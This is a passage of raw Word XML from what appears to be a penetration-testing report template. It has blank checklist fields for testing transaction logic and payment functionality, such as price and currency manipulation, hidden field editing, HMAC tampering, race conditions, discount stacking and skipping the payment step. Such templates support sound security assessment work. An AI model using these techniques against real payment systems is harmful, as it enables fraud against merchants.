w:rsidRPr="00FA1AAF" w:rsidRDefault="00FA1AAF" w:rsidP="00AE30E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A1AAF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90D7C29" w14:textId="77777777" w:rsidR="00FA1AAF" w:rsidRPr="00FA1AAF" w:rsidRDefault="00FA1AAF" w:rsidP="00FA1AA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2C2011" w:rsidRPr="00FA1AAF" w14:paraId="175E804D" w14:textId="77777777" w:rsidTr="00AE30E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2048D36" w14:textId="42D8DBC3" w:rsidR="002C2011" w:rsidRPr="00FA1AAF" w:rsidRDefault="002C2011" w:rsidP="00AE30E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C2011">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Transaction Flow Mapped?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6A95D60" w14:textId="77777777" w:rsidR="002C2011" w:rsidRDefault="006E451C" w:rsidP="00FA1AA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E451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[*Yes/No, Key Steps Identified: Checkout, Funds Transfer, etc.]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25B35249" w14:textId="77777777" w:rsidR="006E451C" w:rsidRDefault="006E451C" w:rsidP="00FA1AA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2EB834F" w14:textId="77777777" w:rsidR="00AE30E9" w:rsidRDefault="00AE30E9" w:rsidP="00FA1AA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3AA4D25" w14:textId="48782466" w:rsidR="00AE30E9" w:rsidRPr="006E451C" w:rsidRDefault="00AE30E9" w:rsidP="00FA1AA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A1AAF" w:rsidRPr="00FA1AAF" w14:paraId="09F08991" w14:textId="77777777" w:rsidTr="00AE30E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71F1D63" w14:textId="77777777" w:rsidR="00FA1AAF" w:rsidRPr="00FA1AAF" w:rsidRDefault="00FA1AAF" w:rsidP="00AE30E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A1AAF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Checked Application Algorithms for Adjustments Made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1FB70C4C" w14:textId="77777777" w:rsidR="00FA1AAF" w:rsidRPr="00FA1AAF" w:rsidRDefault="00FA1AAF" w:rsidP="00FA1AAF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FA1AAF">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24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4C5F9554" w14:textId="77777777" w:rsidR="00FA1AAF" w:rsidRPr="00FA1AAF" w:rsidRDefault="00FA1AAF" w:rsidP="00FA1AAF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FA1AAF">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00753952" w:rsidRPr="00FA1AAF" w14:paraId="15858B69" w14:textId="77777777" w:rsidTr="00AE30E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28D513C" w14:textId="65D41DDF" w:rsidR="00753952" w:rsidRPr="00FA1AAF" w:rsidRDefault="000415CD" w:rsidP="00AE30E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0415CD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Input Manipulation Tested?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2486B8D1" w14:textId="77777777" w:rsidR="00753952" w:rsidRDefault="000415CD" w:rsidP="0075395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6606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26606A" w:rsidRPr="0026606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Parameters Modified: Price, Quantity, Discounts, etc.]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="715668FB" w14:textId="77777777" w:rsidR="0026606A" w:rsidRDefault="0026606A" w:rsidP="0075395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F82085E" w14:textId="77777777" w:rsidR="0026606A" w:rsidRDefault="0026606A" w:rsidP="0075395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1EB937B" w14:textId="20EC2143" w:rsidR="00AE30E9" w:rsidRPr="0026606A" w:rsidRDefault="00AE30E9" w:rsidP="0075395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A1AAF" w:rsidRPr="00FA1AAF" w14:paraId="1946DE97" w14:textId="77777777" w:rsidTr="00AE30E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BDA2F2E" w14:textId="77777777" w:rsidR="00FA1AAF" w:rsidRPr="00FA1AAF" w:rsidRDefault="00FA1AAF" w:rsidP="00AE30E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FA1AAF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>Methods of Manipulating the Application's Behavior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C50D7B2" w14:textId="77777777" w:rsidR="00FA1AAF" w:rsidRPr="00FA1AAF" w:rsidRDefault="00FA1AAF" w:rsidP="00FA1AAF">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="203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46F955E" w14:textId="77777777" w:rsidR="00FA1AAF" w:rsidRPr="00FA1AAF" w:rsidRDefault="00FA1AAF" w:rsidP="00FA1AAF">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20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7C1F87D" w14:textId="77777777" w:rsidR="00FA1AAF" w:rsidRPr="00FA1AAF" w:rsidRDefault="00FA1AAF" w:rsidP="00FA1AAF">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20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76695E0" w14:textId="77777777" w:rsidR="00FA1AAF" w:rsidRPr="00FA1AAF" w:rsidRDefault="00FA1AAF" w:rsidP="00FA1AAF">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20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5906A46" w14:textId="77777777" w:rsidR="00FA1AAF" w:rsidRPr="00FA1AAF" w:rsidRDefault="00FA1AAF" w:rsidP="00FA1AAF">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20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049C63D" w14:textId="77777777" w:rsidR="00FA1AAF" w:rsidRPr="00FA1AAF" w:rsidRDefault="00FA1AAF" w:rsidP="00FA1AA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4723E7" w:rsidRPr="00FA1AAF" w14:paraId="4AC18229" w14:textId="77777777" w:rsidTr="00AE30E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3962208" w14:textId="0D5E5169" w:rsidR="004723E7" w:rsidRPr="00FA1AAF" w:rsidRDefault="004723E7" w:rsidP="00AE30E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4723E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Negative Input Handling Issues?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2D69B1A" w14:textId="77777777" w:rsidR="004723E7" w:rsidRPr="004723E7" w:rsidRDefault="004723E7" w:rsidP="004723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4723E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[*Yes/No, Reverse Transactions Allowed?]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AA14D45" w14:textId="77777777" w:rsidR="004723E7" w:rsidRDefault="004723E7" w:rsidP="004723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7C2653A" w14:textId="77777777" w:rsidR="004723E7" w:rsidRDefault="004723E7" w:rsidP="004723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1A464F2" w14:textId="0FDDC5B9" w:rsidR="00B77674" w:rsidRPr="00FA1AAF" w:rsidRDefault="00B77674" w:rsidP="004723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BF1E4D" w:rsidRPr="00FA1AAF" w14:paraId="2753BC7B" w14:textId="77777777" w:rsidTr="00AE30E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FA221A0" w14:textId="1B084F2D" w:rsidR="00BF1E4D" w:rsidRPr="004723E7" w:rsidRDefault="00BF1E4D" w:rsidP="00AE30E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BF1E4D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Transaction Limits Tested?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D832137" w14:textId="77777777" w:rsidR="00BF1E4D" w:rsidRDefault="00BF1E4D" w:rsidP="004723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BF1E4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Bypass Techniques Used: Small Successive Transactions,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E830319" w14:textId="77777777" w:rsidR="00BF1E4D" w:rsidRDefault="00BF1E4D" w:rsidP="004723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9F0D622" w14:textId="48444795" w:rsidR="00BF1E4D" w:rsidRPr="004723E7" w:rsidRDefault="00BF1E4D" w:rsidP="004723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486215" w:rsidRPr="00FA1AAF" w14:paraId="08B7578A" w14:textId="77777777" w:rsidTr="00AE30E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72F5173" w14:textId="2F38F4FF" w:rsidR="00486215" w:rsidRPr="00BF1E4D" w:rsidRDefault="00486215" w:rsidP="00AE30E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48621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Inconsistent Transaction States Identified?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F0B943C" w14:textId="77777777" w:rsidR="00486215" w:rsidRDefault="00486215" w:rsidP="004723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48621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Observed Effects: Duplicate Entries, Data Corruption,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C0583BF" w14:textId="77777777" w:rsidR="00486215" w:rsidRDefault="00486215" w:rsidP="004723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9F95F1A" w14:textId="77777777" w:rsidR="00486215" w:rsidRDefault="00486215" w:rsidP="004723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D545E6D" w14:textId="5493A319" w:rsidR="00B77674" w:rsidRDefault="00B77674" w:rsidP="004723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486215" w:rsidRPr="00FA1AAF" w14:paraId="72C5A38E" w14:textId="77777777" w:rsidTr="00AE30E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93FADD6" w14:textId="2A528FF0" w:rsidR="00486215" w:rsidRPr="00486215" w:rsidRDefault="009E75C7" w:rsidP="00AE30E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9E75C7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Dynamic Limit Adjustments Observed?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A89404B" w14:textId="77777777" w:rsidR="00486215" w:rsidRDefault="009E75C7" w:rsidP="004723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9E75C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Factors Influencing Adjustments: User Criteria, Behavior,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F57C303" w14:textId="77777777" w:rsidR="009E75C7" w:rsidRDefault="009E75C7" w:rsidP="004723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AFCE40E" w14:textId="59D7E336" w:rsidR="009E75C7" w:rsidRDefault="009E75C7" w:rsidP="004723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E75C7" w:rsidRPr="00FA1AAF" w14:paraId="3BE35D30" w14:textId="77777777" w:rsidTr="00AE30E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7D5F423" w14:textId="07DB26AE" w:rsidR="009E75C7" w:rsidRPr="009E75C7" w:rsidRDefault="00AA1151" w:rsidP="00AE30E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AA1151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Race Conditions Exploited?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1D696D5" w14:textId="77777777" w:rsidR="009E75C7" w:rsidRDefault="00AA1151" w:rsidP="004723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667D35" w:rsidRPr="00667D3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</w:t>
            </w:r>
            <w:r w:rsidR="00667D3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 Give Details]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="043E7625" w14:textId="77777777" w:rsidR="00667D35" w:rsidRDefault="00667D35" w:rsidP="004723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FE58022" w14:textId="77777777" w:rsidR="00667D35" w:rsidRDefault="00667D35" w:rsidP="004723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603D3DB" w14:textId="3CA37E84" w:rsidR="00B77674" w:rsidRDefault="00B77674" w:rsidP="004723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864131" w:rsidRPr="00FA1AAF" w14:paraId="56888F36" w14:textId="77777777" w:rsidTr="00AE30E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13E8E10" w14:textId="52132D77" w:rsidR="00864131" w:rsidRPr="00AA1151" w:rsidRDefault="00864131" w:rsidP="00AE30E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864131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Error Handling &amp; Rollback Mechanisms Assessed?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7DCA3E7" w14:textId="0FD66DAB" w:rsidR="00864131" w:rsidRDefault="00864131" w:rsidP="004723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86413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Failures in Rollback Identified?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864131" w:rsidRPr="00FA1AAF" w14:paraId="15F02686" w14:textId="77777777" w:rsidTr="00AE30E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05466A0" w14:textId="58CE96B4" w:rsidR="00864131" w:rsidRPr="00864131" w:rsidRDefault="00864131" w:rsidP="00AE30E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864131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Multi-User Transaction Conflicts Detected?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88DC8FF" w14:textId="77777777" w:rsidR="00864131" w:rsidRDefault="00864131" w:rsidP="004723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E94C22" w:rsidRPr="00E94C2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Issues with Concurrent Updates?</w:t>
            </w:r>
            <w:r w:rsidR="00E94C2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0E88540" w14:textId="77777777" w:rsidR="00E94C22" w:rsidRDefault="00E94C22" w:rsidP="004723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D9C8B06" w14:textId="77777777" w:rsidR="00B77674" w:rsidRDefault="00B77674" w:rsidP="004723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0F1C3C5" w14:textId="0BF3D70C" w:rsidR="00E94C22" w:rsidRDefault="00E94C22" w:rsidP="004723E7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FA1AAF" w:rsidRPr="00FA1AAF" w14:paraId="2DD0829D" w14:textId="77777777" w:rsidTr="00AE30E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ED604D2" w14:textId="77777777" w:rsidR="00FA1AAF" w:rsidRPr="00FA1AAF" w:rsidRDefault="00FA1AAF" w:rsidP="00AE30E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FA1AAF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>Test Results for Transaction Logic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383CE73" w14:textId="77777777" w:rsidR="00FA1AAF" w:rsidRPr="00FA1AAF" w:rsidRDefault="00FA1AAF" w:rsidP="00FA1AAF">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20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293C34D" w14:textId="77777777" w:rsidR="00FA1AAF" w:rsidRPr="00FA1AAF" w:rsidRDefault="00FA1AAF" w:rsidP="00FA1AAF">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20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9B863A6" w14:textId="77777777" w:rsidR="00FA1AAF" w:rsidRPr="00FA1AAF" w:rsidRDefault="00FA1AAF" w:rsidP="00FA1AAF">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20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1D3A8C1" w14:textId="77777777" w:rsidR="00FA1AAF" w:rsidRPr="00FA1AAF" w:rsidRDefault="00FA1AAF" w:rsidP="00FA1AAF">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20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FFDB899" w14:textId="77777777" w:rsidR="00FA1AAF" w:rsidRPr="00FA1AAF" w:rsidRDefault="00FA1AAF" w:rsidP="00FA1AAF">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20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39FA02B" w14:textId="77777777" w:rsidR="00FA1AAF" w:rsidRPr="00FA1AAF" w:rsidRDefault="00FA1AAF" w:rsidP="00FA1AA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546FC" w:rsidRPr="00FA1AAF" w14:paraId="4DF855D2" w14:textId="77777777" w:rsidTr="00AE30E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A925C50" w14:textId="7292441F" w:rsidR="003546FC" w:rsidRPr="00FA1AAF" w:rsidRDefault="003546FC" w:rsidP="00AE30E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Other </w:t>
            </w:r>
            <w:r w:rsidRPr="003546FC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4BDAFB8" w14:textId="77777777" w:rsidR="003546FC" w:rsidRDefault="003546FC" w:rsidP="003546F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D0576AA" w14:textId="77777777" w:rsidR="001867A4" w:rsidRDefault="001867A4" w:rsidP="003546F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530853A" w14:textId="77777777" w:rsidR="00B77674" w:rsidRDefault="00B77674" w:rsidP="003546F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9B352AC" w14:textId="77777777" w:rsidR="00B77674" w:rsidRDefault="00B77674" w:rsidP="003546F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E62EA75" w14:textId="77777777" w:rsidR="00E36361" w:rsidRDefault="00E36361" w:rsidP="003546F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BEC2947" w14:textId="77777777" w:rsidR="00E36361" w:rsidRPr="00FA1AAF" w:rsidRDefault="00E36361" w:rsidP="003546FC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FA1AAF" w:rsidRPr="00FA1AAF" w14:paraId="26F1492B" w14:textId="77777777" w:rsidTr="00AE30E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32F9794" w14:textId="77777777" w:rsidR="00FA1AAF" w:rsidRPr="00FA1AAF" w:rsidRDefault="00FA1AAF" w:rsidP="00AE30E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A1AAF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3D6DABD" w14:textId="77777777" w:rsidR="00FA1AAF" w:rsidRPr="00FA1AAF" w:rsidRDefault="00FA1AAF" w:rsidP="00FA1AAF">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20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4925390" w14:textId="77777777" w:rsidR="00FA1AAF" w:rsidRPr="00FA1AAF" w:rsidRDefault="00FA1AAF" w:rsidP="00FA1AAF">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20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C9C790E" w14:textId="77777777" w:rsidR="00FA1AAF" w:rsidRPr="00FA1AAF" w:rsidRDefault="00FA1AAF" w:rsidP="00FA1AAF">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20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9DCDB56" w14:textId="77777777" w:rsidR="00FA1AAF" w:rsidRPr="00FA1AAF" w:rsidRDefault="00FA1AAF" w:rsidP="00FA1AAF">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20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8D7567E" w14:textId="77777777" w:rsidR="00FA1AAF" w:rsidRPr="00FA1AAF" w:rsidRDefault="00FA1AAF" w:rsidP="00FA1AAF">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20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81E2154" w14:textId="77777777" w:rsidR="00FA1AAF" w:rsidRPr="00FA1AAF" w:rsidRDefault="00FA1AAF" w:rsidP="00FA1AA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478F508F" w14:textId="77777777" w:rsidR="007D4FD9" w:rsidRDefault="007D4FD9" w:rsidP="007D4FD9">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D2C80">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Results Analysis: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601259CF" w14:textId="77777777" w:rsidR="007D4FD9" w:rsidRPr="00B07F1E" w:rsidRDefault="007D4FD9" w:rsidP="007D4FD9">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b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4FD9" w:rsidRPr="005D2C80" w14:paraId="4EF310E5" w14:textId="77777777" w:rsidTr="005232C4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B0C4E90" w14:textId="77777777" w:rsidR="007D4FD9" w:rsidRPr="005D2C80" w:rsidRDefault="007D4FD9" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="622EC786" w14:textId="77777777" w:rsidR="007D4FD9" w:rsidRPr="005D2C80" w:rsidRDefault="007D4FD9" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="37A93805" w14:textId="77777777" w:rsidR="007D4FD9" w:rsidRDefault="007D4FD9" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="71D6F792" w14:textId="77777777" w:rsidR="007D4FD9" w:rsidRDefault="007D4FD9" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="02DAC7F7" w14:textId="77777777" w:rsidR="00B77674" w:rsidRDefault="00B77674" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1B7220BD" w14:textId="77777777" w:rsidR="00B77674" w:rsidRDefault="00B77674" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3F127323" w14:textId="77777777" w:rsidR="00B77674" w:rsidRDefault="00B77674" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0F9A13ED" w14:textId="77777777" w:rsidR="00B77674" w:rsidRDefault="00B77674" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="54883444" w14:textId="77777777" w:rsidR="00B77674" w:rsidRDefault="00B77674" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="19CC5F97" w14:textId="77777777" w:rsidR="00B77674" w:rsidRDefault="00B77674" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3B6DB921" w14:textId="77777777" w:rsidR="00B77674" w:rsidRDefault="00B77674" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0E32D3C6" w14:textId="77777777" w:rsidR="007D4FD9" w:rsidRPr="005D2C80" w:rsidRDefault="007D4FD9" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3D655FC9" w14:textId="77777777" w:rsidR="00CC4D94" w:rsidRDefault="00CC4D94" w:rsidP="009B742B">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left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617B2D" w:rsidRPr="00A51A96" w14:paraId="2CB064E3" w14:textId="77777777" w:rsidTr="002464D6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9140" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="571DC8E2" w14:textId="3341408D" w:rsidR="00617B2D" w:rsidRPr="003C713F" w:rsidRDefault="00617B2D" w:rsidP="005232C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11.6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802F83" w:rsidRPr="00802F83">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Test Payment Functionality</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="29E12FE7" w14:textId="77777777" w:rsidR="007D4FD9" w:rsidRPr="002464D6" w:rsidRDefault="007D4FD9" w:rsidP="009B742B">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left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9218B4" w:rsidRPr="00FA1AAF" w14:paraId="62DCDEDC" w14:textId="77777777" w:rsidTr="002464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6D3135C" w14:textId="77777777" w:rsidR="009218B4" w:rsidRPr="00FA1AAF" w:rsidRDefault="009218B4" w:rsidP="002464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A1AAF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A9A773C" w14:textId="77777777" w:rsidR="009218B4" w:rsidRPr="00FA1AAF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218B4" w:rsidRPr="00FA1AAF" w14:paraId="146A74AD" w14:textId="77777777" w:rsidTr="002464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E5E8240" w14:textId="77777777" w:rsidR="009218B4" w:rsidRPr="00FA1AAF" w:rsidRDefault="009218B4" w:rsidP="002464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A1AAF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AB7B369" w14:textId="77777777" w:rsidR="009218B4" w:rsidRPr="00FA1AAF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218B4" w:rsidRPr="00FA1AAF" w14:paraId="4C3A9F6F" w14:textId="77777777" w:rsidTr="002464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30AC6CC" w14:textId="77777777" w:rsidR="009218B4" w:rsidRPr="00FA1AAF" w:rsidRDefault="009218B4" w:rsidP="002464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A1AAF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F79518E" w14:textId="77777777" w:rsidR="009218B4" w:rsidRPr="00FA1AAF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218B4" w:rsidRPr="00FA1AAF" w14:paraId="082F7747" w14:textId="77777777" w:rsidTr="002464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0033FEB" w14:textId="0937C0FD" w:rsidR="009218B4" w:rsidRPr="00FA1AAF" w:rsidRDefault="00354AB4" w:rsidP="002464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54AB4">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Payment Integration Type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7B7BEA4" w14:textId="5CDA94A3" w:rsidR="009218B4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E451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7E60A3" w:rsidRPr="007E60A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Third-Party Gateway, IFRAME, Cross-Domain POST, Direct API Call, etc.</w:t>
            </w:r>
            <w:r w:rsidRPr="006E451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54D6F81" w14:textId="77777777" w:rsidR="009218B4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F1949C1" w14:textId="77777777" w:rsidR="007E60A3" w:rsidRPr="006E451C" w:rsidRDefault="007E60A3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218B4" w:rsidRPr="00FA1AAF" w14:paraId="242CC2F8" w14:textId="77777777" w:rsidTr="002464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FFF87EE" w14:textId="0CEEE05F" w:rsidR="009218B4" w:rsidRPr="00FA1AAF" w:rsidRDefault="007E60A3" w:rsidP="002464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E60A3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Quantity Modification Vulnerabilities Identified?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290E8496" w14:textId="77777777" w:rsidR="009218B4" w:rsidRPr="00FA1AAF" w:rsidRDefault="009218B4" w:rsidP="009218B4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FA1AAF">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24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2D014124" w14:textId="77777777" w:rsidR="009218B4" w:rsidRPr="00FA1AAF" w:rsidRDefault="009218B4" w:rsidP="009218B4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eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FA1AAF">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009218B4" w:rsidRPr="00FA1AAF" w14:paraId="441919B8" w14:textId="77777777" w:rsidTr="002464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440631B" w14:textId="634DC20C" w:rsidR="009218B4" w:rsidRPr="00FA1AAF" w:rsidRDefault="003E0305" w:rsidP="002464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3E030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Price Manipulation Possible?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1526F9CC" w14:textId="5E0D903B" w:rsidR="009218B4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6606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3E0305" w:rsidRPr="003E030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Modified Price Accepted?</w:t>
            </w:r>
            <w:r w:rsidRPr="0026606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349CBAC" w14:textId="77777777" w:rsidR="009218B4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11740AE" w14:textId="77777777" w:rsidR="009218B4" w:rsidRPr="0026606A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218B4" w:rsidRPr="00FA1AAF" w14:paraId="1D316C17" w14:textId="77777777" w:rsidTr="002464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BF9B91C" w14:textId="5DD85749" w:rsidR="009218B4" w:rsidRPr="00FA1AAF" w:rsidRDefault="007301D6" w:rsidP="002464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7301D6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Hidden Form Fields Editable?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63F3C5E" w14:textId="1073DB54" w:rsidR="009218B4" w:rsidRPr="004723E7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4723E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[*Yes/No, </w:t>
            </w:r>
            <w:r w:rsidR="002A7FDB" w:rsidRPr="002A7FD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List of Modified Fields if applicable</w:t>
            </w:r>
            <w:r w:rsidRPr="004723E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2FBA9C8" w14:textId="77777777" w:rsidR="009218B4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BAD2A02" w14:textId="77777777" w:rsidR="009218B4" w:rsidRPr="00FA1AAF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218B4" w:rsidRPr="00FA1AAF" w14:paraId="5B3887D8" w14:textId="77777777" w:rsidTr="002464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C0C6E46" w14:textId="686936A6" w:rsidR="009218B4" w:rsidRPr="004723E7" w:rsidRDefault="004E302E" w:rsidP="002464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4E302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Encrypted Transaction Details Tested?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3EF2495" w14:textId="1142305A" w:rsidR="009218B4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AA2325" w:rsidRPr="00AA232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Accepted Unencrypted Requests?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85B47F7" w14:textId="77777777" w:rsidR="009218B4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0E48E6C" w14:textId="77777777" w:rsidR="009218B4" w:rsidRPr="004723E7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218B4" w:rsidRPr="00FA1AAF" w14:paraId="244A17A0" w14:textId="77777777" w:rsidTr="002464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2C055AB" w14:textId="739A4AB7" w:rsidR="009218B4" w:rsidRPr="00BF1E4D" w:rsidRDefault="00E1334E" w:rsidP="002464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E1334E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HMAC Hash Integrity Tested?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7A34B26" w14:textId="460E8291" w:rsidR="009218B4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E1334E" w:rsidRPr="00E1334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Successful Hash Tampering?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E86DC53" w14:textId="77777777" w:rsidR="009218B4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6BF4F17" w14:textId="77777777" w:rsidR="009218B4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218B4" w:rsidRPr="00FA1AAF" w14:paraId="2C1BF92A" w14:textId="77777777" w:rsidTr="002464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97908C0" w14:textId="6061796C" w:rsidR="009218B4" w:rsidRPr="00486215" w:rsidRDefault="003C0A4D" w:rsidP="002464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3C0A4D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Currency Modification Tested?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3518D5C" w14:textId="212A53C8" w:rsidR="009218B4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3C0A4D" w:rsidRPr="003C0A4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Undervalued Transactions Accepted?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AA8D392" w14:textId="77777777" w:rsidR="009218B4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9C95704" w14:textId="77777777" w:rsidR="009218B4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218B4" w:rsidRPr="00FA1AAF" w14:paraId="4F2890D2" w14:textId="77777777" w:rsidTr="002464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8328963" w14:textId="58799C26" w:rsidR="009218B4" w:rsidRPr="009E75C7" w:rsidRDefault="00E74812" w:rsidP="002464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E74812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Discount Code Exploits Identified?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5CD7F98" w14:textId="2614F903" w:rsidR="009218B4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F74B6" w:rsidRPr="00CF74B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Guessable Codes, Stacking Discounts, Exposed Codes in Source,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7A4C1E2" w14:textId="77777777" w:rsidR="009218B4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6AEE8E0" w14:textId="77777777" w:rsidR="009218B4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218B4" w:rsidRPr="00FA1AAF" w14:paraId="0E7CE69C" w14:textId="77777777" w:rsidTr="002464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248B203" w14:textId="7CA2F1A8" w:rsidR="009218B4" w:rsidRPr="00AA1151" w:rsidRDefault="00CF74B6" w:rsidP="002464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CF74B6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Checkout Sequence Manipulation Tested?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9E2023F" w14:textId="793BB489" w:rsidR="009218B4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F74B6" w:rsidRPr="00CF74B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Skipped Payment and Accessed Success Page?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9218B4" w:rsidRPr="00FA1AAF" w14:paraId="5668E846" w14:textId="77777777" w:rsidTr="002464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8A7993B" w14:textId="1A048D90" w:rsidR="009218B4" w:rsidRPr="00864131" w:rsidRDefault="00334469" w:rsidP="002464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33446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>Transaction Processing Fee Exploit Possible?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0AE4CDF" w14:textId="496CB885" w:rsidR="009218B4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334469" w:rsidRPr="00334469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Very Low Payments Accepted?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9C7B1B9" w14:textId="77777777" w:rsidR="009218B4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F9BA342" w14:textId="77777777" w:rsidR="009218B4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7FB481E" w14:textId="77777777" w:rsidR="00A63604" w:rsidRDefault="00A63604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CF9CE37" w14:textId="77777777" w:rsidR="00A63604" w:rsidRDefault="00A63604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9218B4" w:rsidRPr="00FA1AAF" w14:paraId="5FDBF853" w14:textId="77777777" w:rsidTr="002464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1A3AC89" w14:textId="77777777" w:rsidR="009218B4" w:rsidRPr="00FA1AAF" w:rsidRDefault="009218B4" w:rsidP="002464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FA1AAF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Test Results for Transaction Logic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F1EB4D9" w14:textId="77777777" w:rsidR="009218B4" w:rsidRPr="00FA1AAF" w:rsidRDefault="009218B4" w:rsidP="009218B4">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="206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80CC1B2" w14:textId="77777777" w:rsidR="009218B4" w:rsidRPr="00FA1AAF" w:rsidRDefault="009218B4" w:rsidP="009218B4">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="206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C6FB3D6" w14:textId="77777777" w:rsidR="009218B4" w:rsidRPr="00FA1AAF" w:rsidRDefault="009218B4" w:rsidP="009218B4">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20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4530157" w14:textId="77777777" w:rsidR="009218B4" w:rsidRPr="00FA1AAF" w:rsidRDefault="009218B4" w:rsidP="009218B4">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20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F675653" w14:textId="77777777" w:rsidR="009218B4" w:rsidRPr="00FA1AAF" w:rsidRDefault="009218B4" w:rsidP="009218B4">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
